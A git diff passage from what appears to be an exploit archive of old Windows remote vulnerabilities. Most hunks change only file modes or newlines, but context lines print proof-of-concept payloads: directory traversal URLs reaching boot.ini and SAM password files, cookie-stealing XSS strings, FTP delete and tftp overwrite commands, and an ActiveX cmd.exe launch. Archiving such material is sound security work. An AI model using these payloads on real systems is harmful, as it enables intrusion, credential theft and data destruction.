+http://liteserve.net/dir?%3C%2FTITLE%3E%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28location%2Ehref%29%22%3E \ No newline at end of file diff --git a/platforms/windows/remote/22001.txt b/platforms/windows/remote/22001.txt old mode 100755 new mode 100644 index 801bfd5e5..d4b0bdad8 --- a/platforms/windows/remote/22001.txt +++ b/platforms/windows/remote/22001.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6145/info Simple Web Server does not properly sanitize web requests. By adding a slash-slash sequence ('//') to a URI, it is possible for an attacker to disclose files on the vulnerable web server, effectively bypassing any access controls. -http://server.com///secret/file \ No newline at end of file +http://server.com///secret/file \ No newline at end of file diff --git a/platforms/windows/remote/22007.txt b/platforms/windows/remote/22007.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22022.txt b/platforms/windows/remote/22022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22023.c b/platforms/windows/remote/22023.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22024.txt b/platforms/windows/remote/22024.txt old mode 100755 new mode 100644 index 54f07f7d1..bcec34c66 --- a/platforms/windows/remote/22024.txt +++ b/platforms/windows/remote/22024.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/6198/info A vulnerability has been discovered in Tftpd32 which allows a remote attacker to download and upload arbitrary system files. The ability to upload system files may allow an attacker to replaced key system files with trojaned copies, used to open backdoors into a target system. tftp host GET /boot.ini -tftp host PUT myfile /boot.ini \ No newline at end of file +tftp host PUT myfile /boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/22027.txt b/platforms/windows/remote/22027.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22028.txt b/platforms/windows/remote/22028.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22032.txt b/platforms/windows/remote/22032.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22078.txt b/platforms/windows/remote/22078.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22112.txt b/platforms/windows/remote/22112.txt old mode 100755 new mode 100644 index 767b33635..04e7d6333 --- a/platforms/windows/remote/22112.txt +++ b/platforms/windows/remote/22112.txt @@ -4,4 +4,4 @@ It has been reported that PlatinumFTPserver fails to properly sanitize some FTP Disclosure of sensitive system files may aid the attacker in launching further attacks against the target system. -dir ..\..\..\..\ \ No newline at end of file +dir ..\..\..\..\ \ No newline at end of file diff --git a/platforms/windows/remote/22113.txt b/platforms/windows/remote/22113.txt old mode 100755 new mode 100644 index f0948f384..1ab5933cb --- a/platforms/windows/remote/22113.txt +++ b/platforms/windows/remote/22113.txt @@ -4,4 +4,4 @@ It has been reported that PlatinumFTPserver fails to properly sanitize some FTP Deleting arbitrary files may render the system unusable. Other scenarios are also possible. -delete ..\..\..\..\boot.ini \ No newline at end of file +delete ..\..\..\..\boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/22136.txt b/platforms/windows/remote/22136.txt old mode 100755 new mode 100644 index 77c340f02..b53bfcb99 --- a/platforms/windows/remote/22136.txt +++ b/platforms/windows/remote/22136.txt @@ -10,4 +10,4 @@ where directory represents a directory outside the FTP root. del ..\file -where file represents a file outside the FTP root. \ No newline at end of file +where file represents a file outside the FTP root. \ No newline at end of file diff --git a/platforms/windows/remote/22142.c b/platforms/windows/remote/22142.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22144.txt b/platforms/windows/remote/22144.txt old mode 100755 new mode 100644 index 5cbb58cc1..b04245f37 --- a/platforms/windows/remote/22144.txt +++ b/platforms/windows/remote/22144.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6587/info A problem with the handling of input has been reported in Xynph FTP Server. Under some circumstances, it may be possible for a remote user to escape the FTP root directory using relative path notation. This could allow unauthorized access to systems using the vulnerable software. -cd ... \ No newline at end of file +cd ... \ No newline at end of file diff --git a/platforms/windows/remote/22171.txt b/platforms/windows/remote/22171.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22173.txt b/platforms/windows/remote/22173.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22174.txt b/platforms/windows/remote/22174.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22185.txt b/platforms/windows/remote/22185.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22194.txt b/platforms/windows/remote/22194.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22213.txt b/platforms/windows/remote/22213.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22217.txt b/platforms/windows/remote/22217.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22218.txt b/platforms/windows/remote/22218.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22219.txt b/platforms/windows/remote/22219.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22226.txt b/platforms/windows/remote/22226.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2223.c b/platforms/windows/remote/2223.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22269.txt b/platforms/windows/remote/22269.txt old mode 100755 new mode 100644 index e5f45a173..ae2c12406 --- a/platforms/windows/remote/22269.txt +++ b/platforms/windows/remote/22269.txt @@ -6,4 +6,4 @@ Disclosed path information could be used to launch further attacks against the s http://hostname/?mod=some_thing&op=browse -http://hostname/?mod=node&nid=some_thing&op=view \ No newline at end of file +http://hostname/?mod=node&nid=some_thing&op=view \ No newline at end of file diff --git a/platforms/windows/remote/22270.txt b/platforms/windows/remote/22270.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22280.txt b/platforms/windows/remote/22280.txt old mode 100755 new mode 100644 index 107746bc3..76820b7f2 --- a/platforms/windows/remote/22280.txt +++ b/platforms/windows/remote/22280.txt @@ -10,4 +10,4 @@ An issue similar to this was reported for Internet Explorer (BID 3867). It appea classid="clsid:11111111-1111-1111-1111" code base="C:WINDOWSFTP.EXE"></object>]]></exploit></security></xml> <SPAN dataFld=exploit dataFormatAs=html -dataSrc=#oExec></SPAN> \ No newline at end of file +dataSrc=#oExec></SPAN> \ No newline at end of file diff --git a/platforms/windows/remote/22288.txt b/platforms/windows/remote/22288.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22289.c b/platforms/windows/remote/22289.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22301.html b/platforms/windows/remote/22301.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2233.c b/platforms/windows/remote/2233.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22338.txt b/platforms/windows/remote/22338.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22341.txt b/platforms/windows/remote/22341.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22366.c b/platforms/windows/remote/22366.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22367.txt b/platforms/windows/remote/22367.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22368.txt b/platforms/windows/remote/22368.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22418.c b/platforms/windows/remote/22418.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22434.txt b/platforms/windows/remote/22434.txt old mode 100755 new mode 100644 index 2c6a2130b..bdeb31125 --- a/platforms/windows/remote/22434.txt +++ b/platforms/windows/remote/22434.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability by making a request for these files. An attacker can use the information obtained in this manner to launch further attacks against a vulnerable host. http://[target]/cgi-bin/environ.pl -http://[target]/cgi-bin/testcgi.exe \ No newline at end of file +http://[target]/cgi-bin/testcgi.exe \ No newline at end of file diff --git a/platforms/windows/remote/22448.txt b/platforms/windows/remote/22448.txt old mode 100755 new mode 100644 index b08b31a00..5f10369d1 --- a/platforms/windows/remote/22448.txt +++ b/platforms/windows/remote/22448.txt @@ -11,4 +11,4 @@ And also: .////////////// .%20 .%20%20 -.. \ No newline at end of file +.. \ No newline at end of file diff --git a/platforms/windows/remote/22476.txt b/platforms/windows/remote/22476.txt old mode 100755 new mode 100644 index 0530fdfa1..3a721c45a --- a/platforms/windows/remote/22476.txt +++ b/platforms/windows/remote/22476.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for QuickFront that will result in the disclos QuickFront does not properly sanitize user-supplied input. Specifically, directory traversal sequences such as '../' to HTTP requests are not removed. -http://<target>/../../../../../boot.ini \ No newline at end of file +http://<target>/../../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/22488.txt b/platforms/windows/remote/22488.txt old mode 100755 new mode 100644 index 681bdb08a..b6474188d --- a/platforms/windows/remote/22488.txt +++ b/platforms/windows/remote/22488.txt @@ -4,4 +4,4 @@ eZ Publish has been reported prone to sensitive information disclosure vulnerabi An attacker may make a request for and download the underlying site.ini configuration file. The file contains eZ Publish administration credentials stored in plaintext format. Any HTTP requests for this file will reveal the contents of this file to remote attackers. -http://[target]/settings/site.ini \ No newline at end of file +http://[target]/settings/site.ini \ No newline at end of file diff --git a/platforms/windows/remote/22504.txt b/platforms/windows/remote/22504.txt old mode 100755 new mode 100644 index 3df9a0e7a..0550cdced --- a/platforms/windows/remote/22504.txt +++ b/platforms/windows/remote/22504.txt @@ -17,4 +17,4 @@ c:\ ftp www.example.com User (X.X.X.X:(none)): Hack 331 User Hack Ok, password please *** -Password: \ No newline at end of file +Password: \ No newline at end of file diff --git a/platforms/windows/remote/22506.txt b/platforms/windows/remote/22506.txt old mode 100755 new mode 100644 index 28c623d77..5b4353163 --- a/platforms/windows/remote/22506.txt +++ b/platforms/windows/remote/22506.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7378/info It has been announced that EZ Server is vulnerable to a condition that may result in the disclosure of potentially sensitive information through requests that have directory traversal sequences. -http://[target]/../../winnt/win.ini \ No newline at end of file +http://[target]/../../winnt/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/22511.txt b/platforms/windows/remote/22511.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22515.txt b/platforms/windows/remote/22515.txt old mode 100755 new mode 100644 index a8198622c..adaf80846 --- a/platforms/windows/remote/22515.txt +++ b/platforms/windows/remote/22515.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7397/info AN HTTPd contains a sample script named count.pl that may be used as a web counter. This script does not perform adequate access validation on paths containing directory traversal (../) character seqences. The vulnerable script may be used to overwrite any file to which it has write permissions by supplying that file name as input. -http://www.victim.com/isapi/count.pl??../../../../../../../../../../../../../../../../../../../../../../winnt/explorer.exe \ No newline at end of file +http://www.victim.com/isapi/count.pl??../../../../../../../../../../../../../../../../../../../../../../winnt/explorer.exe \ No newline at end of file diff --git a/platforms/windows/remote/22530.pl b/platforms/windows/remote/22530.pl index b528d617b..e990af460 100755 --- a/platforms/windows/remote/22530.pl +++ b/platforms/windows/remote/22530.pl @@ -8,4 +8,4 @@ A vulnerability has been discovered in Microsoft Internet Explorer. Due to insuf $LONG="A"x300; print "Content-type: $LONG\r\n"; print "Content-encoding: $LONG\r\n"; -print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - \ No newline at end of file +print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - \ No newline at end of file diff --git a/platforms/windows/remote/22546.txt b/platforms/windows/remote/22546.txt old mode 100755 new mode 100644 index 139c8d8dd..db3131e96 --- a/platforms/windows/remote/22546.txt +++ b/platforms/windows/remote/22546.txt @@ -10,4 +10,4 @@ var message = "http://&#39;);alert(location.href+&#39;"; opera.postError( message ); Additional exploit examples can be found in the attached Bugtraq reference. -location.href = "file://localhost/console.html"; \ No newline at end of file +location.href = "file://localhost/console.html"; \ No newline at end of file diff --git a/platforms/windows/remote/22556.c b/platforms/windows/remote/22556.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22562.pl b/platforms/windows/remote/22562.pl index d9557fd7b..7b798c8a6 100755 --- a/platforms/windows/remote/22562.pl +++ b/platforms/windows/remote/22562.pl @@ -119,4 +119,4 @@ print "Number Of Tries : $count \n"; sub space { print "\n" x2; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/22570.java b/platforms/windows/remote/22570.java old mode 100755 new mode 100644 index d9c060062..2b4ae1601 --- a/platforms/windows/remote/22570.java +++ b/platforms/windows/remote/22570.java @@ -71,4 +71,4 @@ public class MediaPlayerExploit extends HttpServlet { doGet(request, response); } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/22575.txt b/platforms/windows/remote/22575.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22593.html b/platforms/windows/remote/22593.html old mode 100755 new mode 100644 index d7d5b474e..63688599e --- a/platforms/windows/remote/22593.html +++ b/platforms/windows/remote/22593.html @@ -11,4 +11,4 @@ classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498"> yahooaudio.hostname="longstringheremorethan500chars"; yahooaudio.createandjoinconference(); </script> ---------------------------- \ No newline at end of file +--------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/22604.txt b/platforms/windows/remote/22604.txt old mode 100755 new mode 100644 index f4763ed42..f4081d194 --- a/platforms/windows/remote/22604.txt +++ b/platforms/windows/remote/22604.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7608/info A vulnerability has been reported for ArGoSoft Mail Server FreeWare version. The problem occurs due to the FreeWare version of ArGoSoft failing to carry out sufficient authentication before granting access to the user management interface. As a result, an unauthorized user may be capable of tampering with sensitive server settings or user information. Access to this interface may also allow for the disclosure of sensitive information such as username or passwords. -http://www.target.org/useradm \ No newline at end of file +http://www.target.org/useradm \ No newline at end of file diff --git a/platforms/windows/remote/22609.txt b/platforms/windows/remote/22609.txt old mode 100755 new mode 100644 index 1de724c41..c48b4b2c5 --- a/platforms/windows/remote/22609.txt +++ b/platforms/windows/remote/22609.txt @@ -5,4 +5,4 @@ It has been announced that Snowblind Web Server is vulnerable to a condition tha According to the report, Snowblind Web Server does not perform correct access validation on client requested paths which include "../" character sequences. http://www.example.com/../../windows/system.ini -http://www.example.com/internal.sws?../../windows/system.ini \ No newline at end of file +http://www.example.com/internal.sws?../../windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/22620.txt b/platforms/windows/remote/22620.txt old mode 100755 new mode 100644 index 51fb1a668..15240de47 --- a/platforms/windows/remote/22620.txt +++ b/platforms/windows/remote/22620.txt @@ -6,4 +6,4 @@ It is possible to bypass BadBlue security checks when '.hts' files are requested http://www.example.com/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0=add&a1=root&a2=%5C -This example will reveal the contents of the server's primary volume. \ No newline at end of file +This example will reveal the contents of the server's primary volume. \ No newline at end of file diff --git a/platforms/windows/remote/22631.txt b/platforms/windows/remote/22631.txt old mode 100755 new mode 100644 index 2ecb61bed..703bedf75 --- a/platforms/windows/remote/22631.txt +++ b/platforms/windows/remote/22631.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7661/info http://www.example.com/%70rotected/secret.html -http://www.example.com/protected%2fsecret.html \ No newline at end of file +http://www.example.com/protected%2fsecret.html \ No newline at end of file diff --git a/platforms/windows/remote/22635.c b/platforms/windows/remote/22635.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22636.txt b/platforms/windows/remote/22636.txt old mode 100755 new mode 100644 index 0ce664ec8..760df1f18 --- a/platforms/windows/remote/22636.txt +++ b/platforms/windows/remote/22636.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7669/info EServ does not sufficiently prevent web users from being able to view directory indexes. This may result in disclosure of sensitive information. -GET /? HTTP/1.1 \ No newline at end of file +GET /? HTTP/1.1 \ No newline at end of file diff --git a/platforms/windows/remote/2265.c b/platforms/windows/remote/2265.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22664.txt b/platforms/windows/remote/22664.txt old mode 100755 new mode 100644 index 5a477866b..09676c072 --- a/platforms/windows/remote/22664.txt +++ b/platforms/windows/remote/22664.txt @@ -6,4 +6,4 @@ This issue exists for Sun ONE Application Server 7.0 on Microsoft Windows platfo GET /[script].JSP HTTP/1.0 -where [script] is the name of a script hosted by the server. \ No newline at end of file +where [script] is the name of a script hosted by the server. \ No newline at end of file diff --git a/platforms/windows/remote/22665.txt b/platforms/windows/remote/22665.txt old mode 100755 new mode 100644 index 5f564e316..06cffd86a --- a/platforms/windows/remote/22665.txt +++ b/platforms/windows/remote/22665.txt @@ -9,4 +9,4 @@ This issue affects a sample script supplied with the server. The vendor has repo This vulnerability has been reported to affect Sun ONE Application Server 6.1, 6.1 Service Pack 1, and 7.0 on Windows platforms. GET /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script> -HTTP/1.0 \ No newline at end of file +HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/22674.txt b/platforms/windows/remote/22674.txt old mode 100755 new mode 100644 index d05e13af8..a4f6b2845 --- a/platforms/windows/remote/22674.txt +++ b/platforms/windows/remote/22674.txt @@ -5,4 +5,4 @@ Reportedly an attacker may make a malicious HTTP request for specific P-Synch ex This vulnerability was reported to affect P-Synch version 6.2.5 other versions may also be affected. https://www.example.org/psynch/nph-psa.exe?lang= -https://www.example.org/psynch/nph-psf.exe?lang= \ No newline at end of file +https://www.example.org/psynch/nph-psf.exe?lang= \ No newline at end of file diff --git a/platforms/windows/remote/22676.txt b/platforms/windows/remote/22676.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22677.txt b/platforms/windows/remote/22677.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22691.txt b/platforms/windows/remote/22691.txt old mode 100755 new mode 100644 index 6c8ccb076..543f261f6 --- a/platforms/windows/remote/22691.txt +++ b/platforms/windows/remote/22691.txt @@ -6,4 +6,4 @@ CWD ... CWD /... CWD /...... CWD \... -CWD ...CWD .../ \ No newline at end of file +CWD ...CWD .../ \ No newline at end of file diff --git a/platforms/windows/remote/22721.txt b/platforms/windows/remote/22721.txt old mode 100755 new mode 100644 index a82ddfe10..f4c1692b2 --- a/platforms/windows/remote/22721.txt +++ b/platforms/windows/remote/22721.txt @@ -8,4 +8,4 @@ An attacker may exploit this vulnerability to access arbitrary files on the unde It should be noted that while this vulnerability has been reported to affect Pablo FTP service version 1.2, other versions might also be affected. -ftp://www.example.com/windows/repair/sam \ No newline at end of file +ftp://www.example.com/windows/repair/sam \ No newline at end of file diff --git a/platforms/windows/remote/22722.txt b/platforms/windows/remote/22722.txt old mode 100755 new mode 100644 index acdd2ed77..58cbd2ad7 --- a/platforms/windows/remote/22722.txt +++ b/platforms/windows/remote/22722.txt @@ -4,4 +4,4 @@ It has been reported that Pablo FTP Service stores FTP User account passwords in It should be noted that while this weakness has been reported to affect Pablo FTP service version 1.2, other versions might also be affected. -ftp://www.example.com/program files/pablo's ftp service/users.dat \ No newline at end of file +ftp://www.example.com/program files/pablo's ftp service/users.dat \ No newline at end of file diff --git a/platforms/windows/remote/22723.txt b/platforms/windows/remote/22723.txt old mode 100755 new mode 100644 index 0edb0d3f5..793a20133 --- a/platforms/windows/remote/22723.txt +++ b/platforms/windows/remote/22723.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7802/info The MegaBrowser HTTP server component is prone to a file disclosure vulnerability. Directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result. -http://www.example.com/../../../../../WINNT/repair/sam \ No newline at end of file +http://www.example.com/../../../../../WINNT/repair/sam \ No newline at end of file diff --git a/platforms/windows/remote/22726.txt b/platforms/windows/remote/22726.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22728.txt b/platforms/windows/remote/22728.txt old mode 100755 new mode 100644 index 2207c2dcf..bf694bf3a --- a/platforms/windows/remote/22728.txt +++ b/platforms/windows/remote/22728.txt @@ -4,4 +4,4 @@ The Microsoft Internet Explorer FTP indexing implementation could allow script c Any script would be executed with the permissions of the user running Internet Explorer. -ftp://%3cimg%20src%3d%22%22%20onerror%3d%22alert%28document%2eURL%29%22%3e.example.com/ \ No newline at end of file +ftp://%3cimg%20src%3d%22%22%20onerror%3d%22alert%28document%2eURL%29%22%3e.example.com/ \ No newline at end of file diff --git a/platforms/windows/remote/22734.html b/platforms/windows/remote/22734.html old mode 100755 new mode 100644 index 9f004157d..00fc3c9a7 --- a/platforms/windows/remote/22734.html +++ b/platforms/windows/remote/22734.html @@ -19,4 +19,4 @@ codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script> The following will read the file %TEMP%\exploit.html on a Windows 2003 system: -<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a> \ No newline at end of file +<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a> \ No newline at end of file diff --git a/platforms/windows/remote/22737.txt b/platforms/windows/remote/22737.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22738.txt b/platforms/windows/remote/22738.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22758.txt b/platforms/windows/remote/22758.txt old mode 100755 new mode 100644 index 499550ff1..2fe98c7e3 --- a/platforms/windows/remote/22758.txt +++ b/platforms/windows/remote/22758.txt @@ -5,4 +5,4 @@ It has been reported that Simple Web Server fails to properly sanitize web reque This vulnerability has been reported for silentThought Simple Web Server version 1.0 for the Microsoft Windows platform. http://www.example.com/../../winnt/repair/sam._ -http://www.example.com/../../boot.ini \ No newline at end of file +http://www.example.com/../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/2276.pm b/platforms/windows/remote/2276.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22769.txt b/platforms/windows/remote/22769.txt old mode 100755 new mode 100644 index b628ce633..cbcdd3f6b --- a/platforms/windows/remote/22769.txt +++ b/platforms/windows/remote/22769.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7908/info The Methodus 3 Web Server component is prone to a file disclosure vulnerability. It is possible for remote attackers to retrieve resources outside of the web root directory via directory traversal attacks. This could potentially be exploited to gain access to sensitive files on a system hosting the vulnerable software. -http://www.example.com/../../../windows/win.ini \ No newline at end of file +http://www.example.com/../../../windows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/2277.c b/platforms/windows/remote/2277.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22783.txt b/platforms/windows/remote/22783.txt old mode 100755 new mode 100644 index 6de0ef39c..7b531fbcb --- a/platforms/windows/remote/22783.txt +++ b/platforms/windows/remote/22783.txt @@ -6,4 +6,4 @@ If IE, using the MSXML parser, is unable to parse the requested XML file, it wil Exploitation may allow theft of cookie-based authentication credentials or other attacks. -http://host.with.unparsable.xml.file/flaw.xml?<script>alert(document.cookie)</script> \ No newline at end of file +http://host.with.unparsable.xml.file/flaw.xml?<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/windows/remote/22784.txt b/platforms/windows/remote/22784.txt old mode 100755 new mode 100644 index b25116a64..fa47a89e2 --- a/platforms/windows/remote/22784.txt +++ b/platforms/windows/remote/22784.txt @@ -10,4 +10,4 @@ res://shdoclc.dll/HTTP_501.htm#javascript:%2f*://*%2falert(location.href)/ "Marek Blahus" <marek@blahus.cz> also provided an additional proof-of-concept example: -res://shdoclc.dll/http_404.htm#javascript:alert(String.fromCharCode(72,101,108,108,111));//://clickme/ \ No newline at end of file +res://shdoclc.dll/http_404.htm#javascript:alert(String.fromCharCode(72,101,108,108,111));//://clickme/ \ No newline at end of file diff --git a/platforms/windows/remote/22785.txt b/platforms/windows/remote/22785.txt old mode 100755 new mode 100644 index 4bc2e1955..d34b9a515 --- a/platforms/windows/remote/22785.txt +++ b/platforms/windows/remote/22785.txt @@ -5,4 +5,4 @@ The MyServer HTTP server is prone to a file disclosure vulnerability. Encoded di http://www.example.com/%2e%2e/%2e%2e/%2e%2e http://www.example.com/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._ http://www.example.com/%2e%2e/logs -http://www.example.com/%2e%2e/system \ No newline at end of file +http://www.example.com/%2e%2e/system \ No newline at end of file diff --git a/platforms/windows/remote/22795.txt b/platforms/windows/remote/22795.txt old mode 100755 new mode 100644 index 2a10d2028..1c5f78103 --- a/platforms/windows/remote/22795.txt +++ b/platforms/windows/remote/22795.txt @@ -15,4 +15,4 @@ http://www.example.com/..\..\..\file.ext http://www.example.com/../../../file.ext or as encoded format: http://www.example.com/%2E%2E%5C%2E%2E%5C%2E%2E%5Cfile.ext -http://www.example.com/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext \ No newline at end of file +http://www.example.com/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext \ No newline at end of file diff --git a/platforms/windows/remote/22807.txt b/platforms/windows/remote/22807.txt old mode 100755 new mode 100644 index c0aae90f0..fe2869756 --- a/platforms/windows/remote/22807.txt +++ b/platforms/windows/remote/22807.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7978/info A problem with Web Filter may allow attackers to obtain access to sensitive files. The vulnerability occurs due to insufficent sanitization of '.../' directory traversal sequences. -http://isa-surfserver:8888/.../.../.../.../winnt/ \ No newline at end of file +http://isa-surfserver:8888/.../.../.../.../winnt/ \ No newline at end of file diff --git a/platforms/windows/remote/22824.txt b/platforms/windows/remote/22824.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22827.txt b/platforms/windows/remote/22827.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2283.c b/platforms/windows/remote/2283.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22833.c b/platforms/windows/remote/22833.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22834.c b/platforms/windows/remote/22834.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22837.c b/platforms/windows/remote/22837.c old mode 100755 new mode 100644 index 386b103f0..826335594 --- a/platforms/windows/remote/22837.c +++ b/platforms/windows/remote/22837.c @@ -252,4 +252,4 @@ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); WSACleanup(); #endif return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/22838.txt b/platforms/windows/remote/22838.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22854.txt b/platforms/windows/remote/22854.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22869.html b/platforms/windows/remote/22869.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22871.c b/platforms/windows/remote/22871.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22872.txt b/platforms/windows/remote/22872.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22892.txt b/platforms/windows/remote/22892.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22909.txt b/platforms/windows/remote/22909.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22917.txt b/platforms/windows/remote/22917.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22919.txt b/platforms/windows/remote/22919.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22944.txt b/platforms/windows/remote/22944.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22951.html b/platforms/windows/remote/22951.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22959.txt b/platforms/windows/remote/22959.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22966.c b/platforms/windows/remote/22966.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/22967.txt b/platforms/windows/remote/22967.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23.c b/platforms/windows/remote/23.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23002.txt b/platforms/windows/remote/23002.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23019.c b/platforms/windows/remote/23019.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23034.txt b/platforms/windows/remote/23034.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23038.c b/platforms/windows/remote/23038.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23040.c b/platforms/windows/remote/23040.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23043.txt b/platforms/windows/remote/23043.txt old mode 100755 new mode 100644 index 6567eb075..ac9c31e40 --- a/platforms/windows/remote/23043.txt +++ b/platforms/windows/remote/23043.txt @@ -35,4 +35,4 @@ location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + sourcePlaystate="play" rn:sendTo="_rpcontextwin"/> </audio> </body> -</smil> \ No newline at end of file +</smil> \ No newline at end of file diff --git a/platforms/windows/remote/23044.txt b/platforms/windows/remote/23044.txt old mode 100755 new mode 100644 index 82cd7870a..64adbfc31 --- a/platforms/windows/remote/23044.txt +++ b/platforms/windows/remote/23044.txt @@ -24,4 +24,4 @@ classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS"); </script> </html> ------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------ \ No newline at end of file diff --git a/platforms/windows/remote/23068.txt b/platforms/windows/remote/23068.txt old mode 100755 new mode 100644 index 90802ca74..7f8fa8381 --- a/platforms/windows/remote/23068.txt +++ b/platforms/windows/remote/23068.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8513/info File Sharing for Net is said to be prone to a directory traversal vulnerability, potentially allowing users to disclose the contents of system files. The problem occurs due to the application failing to parse user-supplied input for directory traversal sequences (../), thus making it possible to access files outside of the established web root. -http://www.example.org/../../../autoexec.bat \ No newline at end of file +http://www.example.org/../../../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/23073.txt b/platforms/windows/remote/23073.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23074.txt 